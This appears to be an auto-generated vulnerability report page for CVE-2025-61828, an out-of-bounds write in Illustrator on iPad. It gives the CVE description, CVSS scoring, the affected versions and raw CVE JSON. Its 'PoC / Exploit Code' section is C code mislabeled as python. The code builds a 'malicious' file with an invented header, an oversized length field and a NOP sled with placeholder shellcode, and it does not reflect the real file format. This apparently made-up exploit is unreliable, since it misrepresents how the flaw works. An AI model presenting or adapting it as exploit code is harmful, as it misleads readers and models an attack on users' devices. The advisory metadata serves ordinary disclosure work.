Security Vulnerability Report
中文
CVE-2025-61828 CVSS 7.8 HIGH

CVE-2025-61828

Published: 2025-11-11 18:15:42
Last Modified: 2025-11-12 16:50:19

Description

Illustrator on iPad versions 3.0.9 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:illustrator_on_ipad:*:*:*:*:*:*:*:* - VULNERABLE
Adobe Illustrator on iPad <= 3.0.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
/* CVE-2025-61828 PoC - Adobe Illustrator iPad Out-of-Bounds Write Note: This is a proof-of-concept structure for demonstration purposes only. Actual exploitation requires specific file format crafting. */ #include <stdio.h> #include <stdlib.h> #include <string.h> // Malicious file structure for Adobe Illustrator iPad typedef struct { unsigned char magic[4]; // File signature unsigned int version; // File version unsigned int data_size; // Payload data size unsigned char* payload; // Malicious payload unsigned char overflow_data[256]; // Data to trigger OOB write } illustrator_file_t; // Generate malicious Illustrator file void generate_malicious_file(const char* filename) { FILE* fp = fopen(filename, "wb"); if (!fp) { printf("[-] Failed to create file\n"); return; } // File header unsigned char header[] = {0x41, 0x49, 0x50, 0x41}; // "AIPA" signature fwrite(header, 1, 4, fp); // Version unsigned int version = 0x00030009; fwrite(&version, 4, 1, fp); // Size field (manipulated to trigger OOB) unsigned int size = 0xFFFFFFFF; // Large size causing overflow fwrite(&size, 4, 1, fp); // Overflow payload - fill with NOP sled + shellcode pattern unsigned char exploit[512]; memset(exploit, 0x90, 512); // NOP sled // Add shellcode placeholder (actual shellcode would be appended) unsigned char shellcode[] = "\x90\x90\x90\xCC"; // Breakpoint memcpy(exploit + 400, shellcode, 4); fwrite(exploit, 1, 512, fp); fclose(fp); printf("[+] Malicious file generated: %s\n", filename); printf("[+] File size: 524 bytes\n"); printf("[+] Target: Adobe Illustrator iPad <= 3.0.9\n"); } int main(int argc, char* argv[]) { printf("=== CVE-2025-61828 PoC Generator ===\n"); printf("Target: Adobe Illustrator iPad\n"); printf("Vulnerability: Out-of-Bounds Write\n"); printf("CVSS Score: 7.8 (High)\n\n"); const char* filename = (argc > 1) ? argv[1] : "malicious_illustrator.adobe"; generate_malicious_file(filename); printf("\n[!] Disclaimer: For authorized security testing only\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61828", "sourceIdentifier": "[email protected]", "published": "2025-11-11T18:15:42.377", "lastModified": "2025-11-12T16:50:19.000", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Illustrator on iPad versions 3.0.9 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:illustrator_on_ipad:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.0.10", "matchCriteriaId": "1998E69B-076B-4CC5-8F34-0B5B25FA88CC"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/illustrator-mobile-ios/apsb25-111.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}